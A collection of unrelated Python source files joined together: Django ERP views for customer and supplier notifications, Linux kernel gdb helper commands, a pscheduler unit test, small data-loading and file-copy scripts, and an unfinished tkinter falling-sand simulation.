return render(request, 'supplier/edit_mrn_supplier.html',{'dc_header':dc_header,'dc_detail':dc_detail,'pk':pk,'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
def show_notification(request):
company = request.session['company']
company = Company_info.objects.get(id = company)
company = Q(company_id = company)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
eventId = request.POST.get('eventId', False)
if eventId:
if eventId[:2] == "DC":
account_info = DcHeaderCustomer.objects.filter(company, dc_no = eventId).first()
tran_no = account_info.dc_no
account_title = account_info.account_id.account_title
return JsonResponse({'account_title':account_title, 'tran_no': tran_no})
elif eventId[:2] == "PO":
account_info = PoHeaderCustomer.objects.filter(company, po_no = eventId).first()
tran_no = account_info.po_no
account_title = account_info.account_id.account_title
return JsonResponse({'account_title':account_title, 'tran_no': tran_no})
elif eventId[:2] == "QU":
account_info = QuotationHeaderCustomer.objects.filter(company, quotation_no = eventId).first()
tran_no = account_info.quotation_no
account_title = account_info.account_id.account_title
return JsonResponse({'account_title':account_title, 'tran_no': tran_no})
elif eventId[:2] == "RF":
account_info = RfqCustomerHeader.objects.filter(company, rfq_no = eventId).first()
tran_no = account_info.rfq_no
account_title = account_info.account_id.account_title
return JsonResponse({'account_title':account_title, 'tran_no': tran_no})
return render(request, 'supplier/index.html',{'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
def update_notification_customer(request):
company = request.session['company']
company = Company_info.objects.get(id = company)
company = Q(company_id = company)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
if request.method == "POST":
postpone_customer = request.POST.get("postpone_customer",False)
turn_off = request.POST.get("turn_off",False)
if turn_off:
turn_off = turn_off
else:
turn_off = 1
if postpone_customer:
postpone_customer = postpone_customer
else:
postpone_customer = datetime.date.today()
print(postpone_customer)
tran_no = request.POST.get("tran_no", False)
if tran_no[:2] == "DC":
update_dc = DcHeaderCustomer.objects.filter(company, dc_no = tran_no).first()
update_dc.follow_up = postpone_customer
update_dc.show_notification = turn_off
update_dc.save()
return redirect('home')
elif tran_no[:2] == "PO":
update_po = PoHeaderCustomer.objects.filter(company, po_no = tran_no).first()
update_po.follow_up = postpone_customer
update_po.show_notification = turn_off
update_po.save()
return redirect('home')
elif tran_no[:2] == "QU":
update_qu = QuotationHeaderCustomer.objects.filter(company, quotation_no = tran_no).first()
update_qu.follow_up = postpone_customer
update_qu.show_notification = turn_off
update_qu.save()
return redirect('home')
elif tran_no[:2] == "RF":
update_rfq = RfqCustomerHeader.objects.filter(company, rfq_no = tran_no).first()
update_rfq.follow_up = postpone_customer
update_rfq.show_notification = turn_off
update_rfq.save()
return redirect('home')
return redirect('home')
@login_required
def show_notification_supplier(request):
company = request.session['company']
company = Company_info.objects.get(id = company)
company = Q(company_id = company)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
eventId = request.POST.get('eventId', False)
if eventId:
if eventId[:2] == "DC":
account_info = DcHeaderSupplier.objects.filter(company, dc_no = eventId).first()
tran_no = account_info.dc_no
account_title = account_info.account_id.account_title
return JsonResponse({'account_title':account_title, 'tran_no': tran_no})
elif eventId[:2] == "PO":
account_info = PoHeaderSupplier.objects.filter(company, po_no = eventId).first()
tran_no = account_info.po_no
account_title = account_info.account_id.account_title
return JsonResponse({'account_title':account_title, 'tran_no': tran_no})
elif eventId[:2] == "QU":
account_info = QuotationHeaderSupplier.objects.filter(company, quotation_no = eventId).first()
tran_no = account_info.quotation_no
account_title = account_info.account_id.account_title
return JsonResponse({'account_title':account_title, 'tran_no': tran_no})
elif eventId[:2] == "RF":
account_info = RfqSupplierHeader.objects.filter(company, rfq_no = eventId).first()
tran_no = account_info.rfq_no
account_title = account_info.account_id.account_title
return JsonResponse({'account_title':account_title, 'tran_no': tran_no})
return render(request, 'supplier/index.html',{'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
def update_notification_supplier(request):
company = request.session['company']
company = Company_info.objects.get(id = company)
company = Q(company_id = company)
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
if request.method == "POST":
postpone_supplier = request.POST.get("postpone_supplier",False)
turn_off = request.POST.get("turn_off",False)
if turn_off:
turn_off = turn_off
else:
turn_off = 1
if postpone_supplier:
postpone_supplier = postpone_supplier
else:
postpone_supplier = datetime.date.today()
print(postpone_supplier)
tran_no = request.POST.get("tran_no", False)
print(tran_no)
if tran_no[:2] == "DC":
update_dc = DcHeaderSupplier.objects.filter(company, dc_no = tran_no).first()
update_dc.follow_up = postpone_supplier
update_dc.show_notification = turn_off
update_dc.save()
return redirect('home')
elif tran_no[:2] == "PO":
update_po = PoHeaderSupplier.objects.filter(company, po_no = tran_no).first()
update_po.follow_up = postpone_supplier
update_po.show_notification = turn_off
update_po.save()
return redirect('home')
elif tran_no[:2] == "QU":
update_qu = QuotationHeaderSupplier.objects.filter(company, quotation_no = tran_no).first()
update_qu.follow_up = postpone_supplier
update_qu.show_notification = turn_off
update_qu.save()
return redirect('home')
elif tran_no[:2] == "RF":
update_rfq = RfqSupplierHeader.objects.filter(company, rfq_no = tran_no).first()
update_rfq.follow_up = postpone_supplier
update_rfq.show_notification = turn_off
update_rfq.save()
return redirect('home')
return redirect('home')
@login_required
def journal_voucher(request):
allow_customer_roles = customer_roles(request.user)
allow_supplier_roles = supplier_roles(request.user)
allow_transaction_roles = transaction_roles(request.user)
allow_inventory_roles = inventory_roles(request.user)
account_title = request.POST.get('account_title', False)
return render('transaction/journal_voucher.html',{'allow_customer_roles':allow_customer_roles,'allow_supplier_roles':allow_supplier_roles,'allow_transaction_roles':allow_transaction_roles,'allow_inventory_roles':allow_inventory_roles, 'allow_report_roles':report_roles(request.user),'is_superuser':request.user.is_superuser})
@login_required
def change_company_view(request,pk):
request.session['company'] = pk
return redirect('home')
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 24 03:01:13 2018
"""
import numpy as np
#Meshgrid
k = np.linspace(1,10,10)
kprime = np.linspace(1,10,10)
z = np.array([1,2,3,4])
#(1) Value function format
kk, zz = np.meshgrid(k,z, indexing = 'ij')
#(2) Array for EV (to reduce computing time)
kkkprime, kkk, zzz = np.meshgrid(k,k,z, indexing = 'ij') |
#!/usr/bin/env python3
"""
test for the Clockstate module.
"""
import unittest
from base_test import PschedTestBase
from pscheduler.clockstate import clock_state
class TestClockstate(PschedTestBase):
"""
Clockstate tests.
"""
def test_clockstate(self):
"""Test clockstate"""
cstate = clock_state()
self.assertTrue(isinstance(cstate, dict))
self.assertTrue("time" in cstate)
self.assertTrue("synchronized" in cstate)
if cstate["synchronized"]:
self.assertTrue("source" in cstate)
# Offset is optional.
self.assertTrue("reference" in cstate)
self.assertFalse("error" in cstate)
else:
self.assertFalse("source" in cstate)
self.assertFalse("offset" in cstate)
self.assertFalse("reference" in cstate)
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# _Author_: xiaofengShi
# Date: 2018-03-25 10:50:53
# Last Modified by: xiaofengShi
# Last Modified time: 2018-03-25 10:50:53
'''
referen url๏ผhttps://pastebin.com/9NNk0uMB
1.ๆพไธไธชๅบ็จไบๆฐๅญฆๅ
ฌๅผ่ฏๅซ็ๆฐๆฎ้่ฟ่ก่ฎญ็ป?
2.ไฝฟ็จๅๆ็ๅ
ฌๅผ่ฟ่ก็ๆๅพ็
'''
import os
'''
็ๆๅบๅ็ๅญ็ฌฆ
0-9
'''
|
# Generated by Django 2.1.7 on 2019-04-14 19:28
from django.db import migrations
def copy_data_to_debt_app(apps, schema_editor):
b_AccountHolder = apps.get_model('budget.AccountHolder')
b_Account = apps.get_model('budget.Account')
b_Statement = apps.get_model('budget.Statement')
d_AccountHolder = apps.get_model('debt.AccountHolder')
d_CreditLine = apps.get_model('debt.CreditLine')
d_Statement = apps.get_model('debt.Statement')
db_alias = schema_editor.connection.alias
for b_ah in b_AccountHolder.objects.using(db_alias).all():
d_AccountHolder.objects.using(db_alias).create(
id=b_ah.id, user=b_ah.user, name=b_ah.name)
for b_a in b_Account.objects.using(db_alias).all():
d_CreditLine.objects.using(db_alias).create(
id=b_a.id,
user=b_a.user,
name=b_a.name,
holder_id=b_a.holder_id,
statement_date=b_a.statement_date,
date_opened=b_a.date_opened,
annual_fee=b_a.annual_fee,
interest_rate=b_a.interest_rate,
credit_line=b_a.credit_line,
min_pay_pct=b_a.min_pay_pct,
min_pay_dlr=b_a.min_pay_dlr,
priority=b_a.priority)
for b_s in b_Statement.objects.using(db_alias).all():
d_Statement.objects.using(db_alias).create(
id=b_s.id,
user=b_s.user,
account_id=b_s.account_id,
year=b_s.year,
month=b_s.month,
balance=b_s.balance)
class Migration(migrations.Migration):
dependencies = [
('debt', '0001_initial'),
]
operations = [
migrations.RunPython(copy_data_to_debt_app, migrations.RunPython.noop),
]
|
#
# gdb helper commands and functions for Linux kernel debugging
#
# Kernel proc information reader
#
# Copyright (c) 2016 Linaro Ltd
#
# Authors:
# Kieran Bingham <kieran.bingham@linaro.org>
#
# This work is licensed under the terms of the GNU GPL version 2.
#
import gdb
from linux import constants
from linux import utils
from linux import tasks
from linux import lists
from struct import *
class LxCmdLine(gdb.Command):
""" Report the Linux Commandline used in the current kernel.
Equivalent to cat /proc/cmdline on a running target"""
def __init__(self):
super(LxCmdLine, self).__init__("lx-cmdline", gdb.COMMAND_DATA)
def invoke(self, arg, from_tty):
gdb.write(gdb.parse_and_eval("saved_command_line").string() + "\n")
LxCmdLine()
class LxVersion(gdb.Command):
""" Report the Linux Version of the current kernel.
Equivalent to cat /proc/version on a running target"""
def __init__(self):
super(LxVersion, self).__init__("lx-version", gdb.COMMAND_DATA)
def invoke(self, arg, from_tty):
# linux_banner should contain a newline
gdb.write(gdb.parse_and_eval("(char *)linux_banner").string())
LxVersion()
# Resource Structure Printers
# /proc/iomem
# /proc/ioports
def get_resources(resource, depth):
while resource:
yield resource, depth
child = resource['child']
if child:
for res, deep in get_resources(child, depth + 1):
yield res, deep
resource = resource['sibling']
def show_lx_resources(resource_str):
resource = gdb.parse_and_eval(resource_str)
width = 4 if resource['end'] < 0x10000 else 8
# Iterate straight to the first child
for res, depth in get_resources(resource['child'], 0):
start = int(res['start'])
end = int(res['end'])
gdb.write(" " * depth * 2 +
"{0:0{1}x}-".format(start, width) +
"{0:0{1}x} : ".format(end, width) +
res['name'].string() + "\n")
class LxIOMem(gdb.Command):
"""Identify the IO memory resource locations defined by the kernel
Equivalent to cat /proc/iomem on a running target"""
def __init__(self):
super(LxIOMem, self).__init__("lx-iomem", gdb.COMMAND_DATA)
def invoke(self, arg, from_tty):
return show_lx_resources("iomem_resource")
LxIOMem()
class LxIOPorts(gdb.Command):
"""Identify the IO port resource locations defined by the kernel
Equivalent to cat /proc/ioports on a running target"""
def __init__(self):
super(LxIOPorts, self).__init__("lx-ioports", gdb.COMMAND_DATA)
def invoke(self, arg, from_tty):
return show_lx_resources("ioport_resource")
LxIOPorts()
# Mount namespace viewer
# /proc/mounts
def info_opts(lst, opt):
opts = ""
for key, string in lst.items():
if opt & key:
opts += string
return opts
FS_INFO = {constants.LX_SB_SYNCHRONOUS: ",sync",
constants.LX_SB_MANDLOCK: ",mand",
constants.LX_SB_DIRSYNC: ",dirsync",
constants.LX_SB_NOATIME: ",noatime",
constants.LX_SB_NODIRATIME: ",nodiratime"}
MNT_INFO = {constants.LX_MNT_NOSUID: ",nosuid",
constants.LX_MNT_NODEV: ",nodev",
constants.LX_MNT_NOEXEC: ",noexec",
constants.LX_MNT_NOATIME: ",noatime",
constants.LX_MNT_NODIRATIME: ",nodiratime",
constants.LX_MNT_RELATIME: ",relatime"}
mount_type = utils.CachedType("struct mount")
mount_ptr_type = mount_type.get_type().pointer()
class LxMounts(gdb.Command):
"""Report the VFS mounts of the current process namespace.
Equivalent to cat /proc/mounts on a running target
An integer value can be supplied to display the mount
values of that process namespace"""
def __init__(self):
super(LxMounts, self).__init__("lx-mounts", gdb.COMMAND_DATA)
# Equivalent to proc_namespace.c:show_vfsmnt
# However, that has the ability to call into s_op functions
# whereas we cannot and must make do with the information we can obtain.
def invoke(self, arg, from_tty):
argv = gdb.string_to_argv(arg)
if len(argv) >= 1:
try:
pid = int(argv[0])
except gdb.error:
raise gdb.GdbError("Provide a PID as integer value")
else:
pid = 1
task = tasks.get_task_by_pid(pid)
if not task:
raise gdb.GdbError("Couldn't find a process with PID {}"
.format(pid))
namespace = task['nsproxy']['mnt_ns']
if not namespace:
raise gdb.GdbError("No namespace for current process")
for vfs in lists.list_for_each_entry(namespace['list'],
mount_ptr_type, "mnt_list"):
devname = vfs['mnt_devname'].string()
devname = devname if devname else "none"
pathname = ""
parent = vfs
while True:
mntpoint = parent['mnt_mountpoint']
pathname = utils.dentry_name(mntpoint) + pathname
if (parent == parent['mnt_parent']):
break
parent = parent['mnt_parent']
if (pathname == ""):
pathname = "/"
superblock = vfs['mnt']['mnt_sb']
fstype = superblock['s_type']['name'].string()
s_flags = int(superblock['s_flags'])
m_flags = int(vfs['mnt']['mnt_flags'])
rd = "ro" if (s_flags & constants.LX_SB_RDONLY) else "rw"
gdb.write(
"{} {} {} {}{}{} 0 0\n"
.format(devname,
pathname,
fstype,
rd,
info_opts(FS_INFO, s_flags),
info_opts(MNT_INFO, m_flags)))
LxMounts()
class LxFdtDump(gdb.Command):
"""Output Flattened Device Tree header and dump FDT blob to the filename
specified as the command argument. Equivalent to
'cat /proc/fdt > fdtdump.dtb' on a running target"""
def __init__(self):
super(LxFdtDump, self).__init__("lx-fdtdump", gdb.COMMAND_DATA,
gdb.COMPLETE_FILENAME)
def fdthdr_to_cpu(self, fdt_header):
fdt_header_be = ">IIIIIII"
fdt_header_le = "<IIIIIII"
if utils.get_target_endianness() == 1:
output_fmt = fdt_header_le
else:
output_fmt = fdt_header_be
return unpack(output_fmt, pack(fdt_header_be,
fdt_header['magic'],
fdt_header['totalsize'],
fdt_header['off_dt_struct'],
fdt_header['off_dt_strings'],
fdt_header['off_mem_rsvmap'],
fdt_header['version'],
fdt_header['last_comp_version']))
def invoke(self, arg, from_tty):
if not constants.LX_CONFIG_OF:
raise gdb.GdbError("Kernel not compiled with CONFIG_OF\n")
if len(arg) == 0:
filename = "fdtdump.dtb"
else:
filename = arg
py_fdt_header_ptr = gdb.parse_and_eval(
"(const struct fdt_header *) initial_boot_params")
py_fdt_header = py_fdt_header_ptr.dereference()
fdt_header = self.fdthdr_to_cpu(py_fdt_header)
if fdt_header[0] != constants.LX_OF_DT_HEADER:
raise gdb.GdbError("No flattened device tree magic found\n")
gdb.write("fdt_magic: 0x{:02X}\n".format(fdt_header[0]))
gdb.write("fdt_totalsize: 0x{:02X}\n".format(fdt_header[1]))
gdb.write("off_dt_struct: 0x{:02X}\n".format(fdt_header[2]))
gdb.write("off_dt_strings: 0x{:02X}\n".format(fdt_header[3]))
gdb.write("off_mem_rsvmap: 0x{:02X}\n".format(fdt_header[4]))
gdb.write("version: {}\n".format(fdt_header[5]))
gdb.write("last_comp_version: {}\n".format(fdt_header[6]))
inf = gdb.inferiors()[0]
fdt_buf = utils.read_memoryview(inf, py_fdt_header_ptr,
fdt_header[1]).tobytes()
try:
f = open(filename, 'wb')
except gdb.error:
raise gdb.GdbError("Could not open file to dump fdt")
f.write(fdt_buf)
f.close()
gdb.write("Dumped fdt blob to " + filename + "\n")
LxFdtDump()
|
from mysql import connector
import mysql.connector.errors
from urllib2 import urlopen
import json
trip_ids=[]
trip_details={}
#db connection object
conn = connector.connect(host='localhost',user='root',passwd='root',db='cubito')
cursor = conn.cursor()
#get trip ids
def getTripId():
for id in range(0,2):
trip_ids.append(json.load(urlopen("http://cubito.co.in/assignment/gpslocation.php")))
for trip_id in trip_ids:
cursor.execute("insert into trips (trip_id) values('"+trip_id["trip_id"]+"')")
conn.commit()
#print trip_id["trip_id"]
def getTripData():
cursor.execute("select trip_id from trips limit 2")
#ids= cursor.fetchall()
ids = trip_ids
#print ids
for trip_id in ids:
print trip_id
key=1
trip_detail = json.load(urlopen("http://cubito.co.in/assignment/gpslocation.php?trip_id="+trip_id["trip_id"]))
while(trip_detail["trip_id"]==trip_id["trip_id"] and trip_detail["status"]=="RUNNING"):
trip_detail = json.load(urlopen("http://cubito.co.in/assignment/gpslocation.php?trip_id="+trip_id["trip_id"]))
print str(trip_detail["status"])+str(key)
#trip_details[trip_detail["lastupdate"]] =
#print trip_detail["location"]
if(trip_detail["status"]=="COMPLETED"):
trip_detail["status"]="COMPLETED"
print str(key)+"completed"
key=key+1
getTripId()
getTripData() |
import csv # https://docs.python.org/3/library/csv.html
# https://django-extensions.readthedocs.io/en/latest/runscript.html
# python3 manage.py runscript many_load
from unesco.models import Category, States, Region, Iso, Site
def run():
fhand = open('unesco/load.csv')
reader = csv.reader(fhand)
next(reader) # Advance past the header
Category.objects.all().delete()
States.objects.all().delete()
Region.objects.all().delete()
Iso.objects.all().delete()
Site.objects.all().delete()
# Format
# name,description,justification,year,longitude,latitude,area_hectares,category,states,region,iso
for row in reader:
print(row)
cat, created = Category.objects.get_or_create(name=row[7])
s, created = States.objects.get_or_create(name=row[8])
reg, created = Region.objects.get_or_create(name=row[9])
iso, created = Iso.objects.get_or_create(name=row[10])
try:
y = int(row[3])
except:
y = None
try:
lon = float(row[4])
except:
lon = None
try:
lat = float(row[5])
except:
lat = None
try:
ar = float(row[6])
except:
ar = None
site = Site(name=row[0], description=row[1], justification=row[2], year=y, longitude=lon, latitude=lat, area_hectares=ar,
category=cat, state=s, region=reg, iso=iso
)
site.save()
|
#!/usr/bin/python2
#-*- coding:utf-8 -*-
import shutil
import os
import os.path
import sys
def cp60(args,dirname,filename):
for i in filename:
try:
if i.startswith('snap_60X60_'):
fn = i.replace('snap_60X60_','')
src = dirname + '/' + i
des= dirname+'/'+fn
print 'from:%s to:%s' %(src,des)
shutil.copy2(src,des)
except Exception as e:
print "error,filename not startswith snap"
pass
if len(sys.argv) > 1:
os.path.walk(sys.argv[1],cp60,None)
|
from os.path import expanduser
import os
import shutil
HOME = expanduser('~')
CWD = os.getcwd()
def run():
print('Creating your flask application...')
shutil.copytree(
'{}/.new-flask-app/boilerplate'.format(HOME), CWD + '/' + 'app'
)
print('The application was created!')
|
import tkinter as tk
import random
import time
class MainWindow:
def __init__(self, root):
self.root = root
#root = tk.Tk()
self.frameCount = 0
self.frameRate = 0
self.physicsTime = 0
self.paintTime = 0
self.totalProcessTime = 0
self.PIXEL_SIZE = 5
self.WINDOW_SIZE = 700
self.selectedElement = 0
self.world = World(self.WINDOW_SIZE, self.PIXEL_SIZE) #Contains particles and does physics calcs (Pysics does not neet to worry about graphics)
self.initGui()
self.gameLoop(root)#Will run on seperate thread(Not really), after meathod will decide when called
self.root.mainloop()#Tkinter event loop
#Initialize tkinter widgets and components
def initGui(self):
self.frame = tk.Frame(bg="white")
self.frame.pack()
self.canvas = tk.Canvas(self.frame, bg="black", width = self.WINDOW_SIZE, height = self.WINDOW_SIZE)
self.canvas.pack()
self.elementSbox = tk.Spinbox(self.frame, from_ = 0, to = 6, repeatdelay = 100, repeatinterval = 100, command = self.newElementSelected)
self.elementSbox.pack()
self.frameRateL = tk.Label(self.frame, text = "0", font = ("Helvetica", 10), anchor = "nw")
self.frameRateL.pack(side = tk.LEFT)
#Bind button listners to respond to clicks on canvas
self.canvas.bind("<Button-1>", self.canvasClicked)
self.canvas.bind("<B1-Motion>", self.canvasClicked)
def gameLoop(self, root):
print("Loop")
tt0 = time.clock()#Start total timer
pht0 = time.clock()#time physics calcs
self.world.updateWorld() #Maybe update and paint at the same time so iteration only has to be don once
pht1 = time.clock()
pt0 = time.clock()#time paint calcs
self.paint(self.world)
pt1 = time.clock()
tt1 = time.clock()
self.frameCount += 1
self.physicsTime = pht1 - pht0
self.paintTime = pt1 - pt0
self.totalProcessTime = tt1 - tt0
self.frameRate = 1.0/(self.totalProcessTime + 0.01)
self.frameRateL.config(text = "FPS:" + str(self.frameRate) + "\n" + "Phys Time:" + str(self.physicsTime*1000) + "\n" + "Paint Time:" + str(self.paintTime*1000) + "\n" + "Total Time:" + str(self.totalProcessTime*1000))
self.job = self.root.after(10, self.gameLoop, root)
def paint(self, world):
print("Paint")
self.canvas.delete(tk.ALL)
#get array from world and iterate
#if blah paint blah at xy
for x in range(int(self.WINDOW_SIZE/self.PIXEL_SIZE)):
for y in range(int(self.WINDOW_SIZE/self.PIXEL_SIZE)):
if world.particleArray[x][y].pType == 1:
self.canvas.create_rectangle(x * self.PIXEL_SIZE, y * self.PIXEL_SIZE, x * self.PIXEL_SIZE + self.PIXEL_SIZE, y * self.PIXEL_SIZE + self.PIXEL_SIZE, fill = "#F0C002")
elif world.particleArray[x][y].pType == 64:
self.canvas.create_rectangle(x * self.PIXEL_SIZE, y * self.PIXEL_SIZE, x * self.PIXEL_SIZE + self.PIXEL_SIZE, y * self.PIXEL_SIZE + self.PIXEL_SIZE, fill = "white")
elif world.particleArray[x][y].pType == 2:
self.canvas.create_rectangle(x * self.PIXEL_SIZE, y * self.PIXEL_SIZE, x * self.PIXEL_SIZE + self.PIXEL_SIZE, y * self.PIXEL_SIZE + self.PIXEL_SIZE, fill = "grey")
elif world.particleArray[x][y].pType == 3:
self.canvas.create_rectangle(x * self.PIXEL_SIZE, y * self.PIXEL_SIZE, x * self.PIXEL_SIZE + self.PIXEL_SIZE, y * self.PIXEL_SIZE + self.PIXEL_SIZE, fill = "blue")
elif world.particleArray[x][y].pType == 4:
self.canvas.create_rectangle(x * self.PIXEL_SIZE, y * self.PIXEL_SIZE, x * self.PIXEL_SIZE + self.PIXEL_SIZE, y * self.PIXEL_SIZE + self.PIXEL_SIZE, fill = "#8C3A00")
elif world.particleArray[x][y].pType == 5:
self.canvas.create_rectangle(x * self.PIXEL_SIZE, y * self.PIXEL_SIZE, x * self.PIXEL_SIZE + self.PIXEL_SIZE, y * self.PIXEL_SIZE + self.PIXEL_SIZE, fill = "#BDEEFF") #Light bluish grey
elif world.particleArray[x][y].pType == 6:
self.canvas.create_rectangle(x * self.PIXEL_SIZE, y * self.PIXEL_SIZE, x * self.PIXEL_SIZE + self.PIXEL_SIZE, y * self.PIXEL_SIZE + self.PIXEL_SIZE, fill = "#2BA6CF")
def canvasClicked(self, event):
print("CLick: " + str(event.x) + ", " + str(event.y))
#convert window pixel coord to tile coord (Determine which tile was clicked)
xTile = (event.x - (event.x % self.PIXEL_SIZE)) / self.PIXEL_SIZE
yTile = (event.y - (event.y % self.PIXEL_SIZE)) / self.PIXEL_SIZE
self.world.addParticle(int(xTile), int(yTile), int(self.selectedElement))
def newElementSelected(self):
self.selectedElement = int(self.elementSbox.get())
#--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
class World:
def __init__(self, WINDOW_SIZE, PIXEL_SIZE):
#Stores classes to be instantiated (Use to get correct Particle sublclass given pType #)
self.Elements = [Air,Sand,Stone,Water,Oil,Ice,Spout]
self.WINDOW_SIZE = WINDOW_SIZE
self.PIXEL_SIZE = PIXEL_SIZE
self.particleArray = [[self.Elements[0](x,y,0) for y in range(int(WINDOW_SIZE/PIXEL_SIZE))] for x in range(int(WINDOW_SIZE/PIXEL_SIZE))]
#Fill boundary with stone so elements dont fall out of bouds (need logic to make out of bounds particles dissapear)
for x in range(int(WINDOW_SIZE/PIXEL_SIZE)):
self.particleArray[x][int(WINDOW_SIZE/PIXEL_SIZE) - 1] = Boundary(x,int(WINDOW_SIZE/PIXEL_SIZE) - 1,64)#64 as type so that its not printed as stone
self.particleArray[x][0] = Boundary(x,0,64)#64 as type so that its not printed as stone
for y in range(int(WINDOW_SIZE/PIXEL_SIZE)):
self.particleArray[int(WINDOW_SIZE/PIXEL_SIZE) - 1][y] = Boundary(int(WINDOW_SIZE/PIXEL_SIZE) - 1, y,64)#64 as type so that its not printed as stone
self.particleArray[0][y] = Boundary(0, y,64)#64 as type so that its not printed as stone
#Simulate next step
def updateWorld(self):
print("Update")
#iterate through particles
#move particles
#maybe have particles determine movement (pass in array?)
for x in range(int(self.WINDOW_SIZE/self.PIXEL_SIZE)):
for y in range(int(self.WINDOW_SIZE/self.PIXEL_SIZE)): #Just call update, no need for check, or
if self.particleArray[x][y].pType != 0 and self.particleArray[x][y].pType != 64 and self.particleArray[x][y].movedFlag is False:
self.particleArray[x][y].update(self.particleArray, self.surroundingParticles(x,y))
for x in range(int(self.WINDOW_SIZE/self.PIXEL_SIZE)):
for y in range(int(self.WINDOW_SIZE/self.PIXEL_SIZE)):
self.particleArray[x][y].movedFlag = False
def addParticle(self, x, y, selectedElement):
print("Add")
self.particleArray[x][y] = self.Elements[selectedElement](x, y, selectedElement)
#move this to particle maybe
def surroundingParticles(self, x, y):
particleList = []
particleList.append(self.particleArray[x-1][y-1])
particleList.append(self.particleArray[x][y-1])
particleList.append(self.particleArray[x+1][y-1])
particleList.append(self.particleArray[x-1][y])
particleList.append(self.particleArray[x+1][y])
particleList.append(self.particleArray[x-1][y+1])
particleList.append(self.particleArray[x][y+1])
particleList.append(self.particleArray[x+1][y+1])
# [0,1,2,3,4,5,6,7]
#
# 0 1 2
# 3 X 4
# 5 6 7
#
return particleList
#--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
class Particle:
#Dont use ints and strings, use smaller, maybe bitmask?
#may not need x, y (determined by position in 2d array)
def __init__(self, x = 0, y = 0, pType = 0, movedFlag = False):
self.x = x
self.y = y
self.pType = pType
self.movedFlag = False
#Pass this in instead from world
self.Elements = [Air,Sand,Stone,Water,Oil,Ice,Spout]
#Default Properties
self.gravity = 1 #1 for normal gravity, -1 for floating, 0 for immovable
self.isSolid = False #For immovable objects such as stone
self.isPowder = False #Powders have infinite density, sink below all liquids, stack with other powders
self.isLiquid = False #Liquids like powders but have varying densities(can float), stacking depends on density
self.density = 1.0 #Density of liquid, with 1 being a powder, always sinks
def update(self, particleArray, neighbourList):
if self.gravity != 0:
self.updateGravity(particleArray, neighbourList)
self.particleLogic(particleArray, neighbourList)
def updateGravity(self, particleArray, neighbourList):
#Gravity logic
#If boundary below
if neighbourList[6].pType == 64:
pass
#if air below or less dense liquid
elif neighbourList[6].pType == 0 or neighbourList[6].density < self.density:
self.swap(self.x, self.y, neighbourList[6].x, neighbourList[6].y, particleArray)
#if Out of bounds (doesnt exist now, using 64 for stone, will change 64 to oob later)
elif neighbourList[6].pType == 63:
self.replaceWithAir()
#if powder below or solid, or more dense (if more dense treat as solid)
elif neighbourList[6].isPowder or neighbourList[6].isSolid or neighbourList[6].density >= self.density:
#check if left or right is open and move if so (Checks for air in text space, should check density instead? This way it will work if a liquid is in another less dense liquid
if neighbourList[5].density < self.density and neighbourList[7].density < self.density:
if random.randint(0,1) == 1:
self.swap(self.x, self.y, neighbourList[5].x, neighbourList[5].y, particleArray)
else:
self.swap(self.x, self.y, neighbourList[7].x, neighbourList[7].y, particleArray)
elif neighbourList[5].density < self.density:
self.swap(self.x, self.y, neighbourList[5].x, neighbourList[5].y, particleArray)
elif neighbourList[7].density < self.density:
self.swap(self.x, self.y, neighbourList[7].x, neighbourList[7].y, particleArray)
#Override to implement custom logic
def particleLogic(self, particleArray, neighbourList):
pass
def swap(self, initX, initY, finX, finY, particleArray):
self.movedFlag = True
particleArray[finX][finY].movedFlag = True
tempX = particleArray[finX][finY].x
particleArray[finX][finY].x = self.x
self.x = tempX
tempY = particleArray[finX][finY].y
particleArray[finX][finY].y = self.y
self.y = tempY
temp = particleArray[finX][finY]
particleArray[finX][finY] = particleArray[initX][initY]
particleArray[initX][initY] = temp
def addParticle(self, x, y, pType, particleArray):
particleArray[x][y] = self.Elements[pType](x,y,pType)
#Dont use, only chenges type not class
def replaceWithAir(self):
self.pType = 0
#-----------------------------------------------------------------------------------------------------
#maybe have a liquid and powder class (extended from particle) which respective elements extend,
class Air(Particle):
def __init__(self, x, y, pType = 0, movedFlag = False):
Particle.__init__(self, x, y, pType, movedFlag)
#Overridden property variables
self.gravity = 0
self.isSolid = False
self.isPowder = False
self.isLiquid = False
self.density = 0.0
#No need to use update function for air so just ovveride
def update(self, particleArray, neighbourList):
pass
class Sand(Particle):
def __init__(self, x, y, pType = 1, movedFlag = False):
Particle.__init__(self, x, y, pType, movedFlag)
#Overridden property variables
self.gravity = 1
self.isSolid = False
self.isPowder = True
self.isLiquid = False
self.density = 1.0
class Stone(Particle):
def __init__(self, x, y, pType = 2, movedFlag = False):
Particle.__init__(self, x, y, pType, movedFlag)
#Overridden property variables
self.gravity = 0
self.isSolid = True
self.isPowder = False
self.isLiquid = False
class Water(Particle):
def __init__(self, x, y, pType = 3, movedFlag = False):
Particle.__init__(self, x, y, pType, movedFlag)
#Overridden property variables
self.gravity = 1
self.isSolid = False
self.isPowder = False
self.isLiquid = True
self.density = 0.5
def particleLogic(self, particleArray, neighbourList):
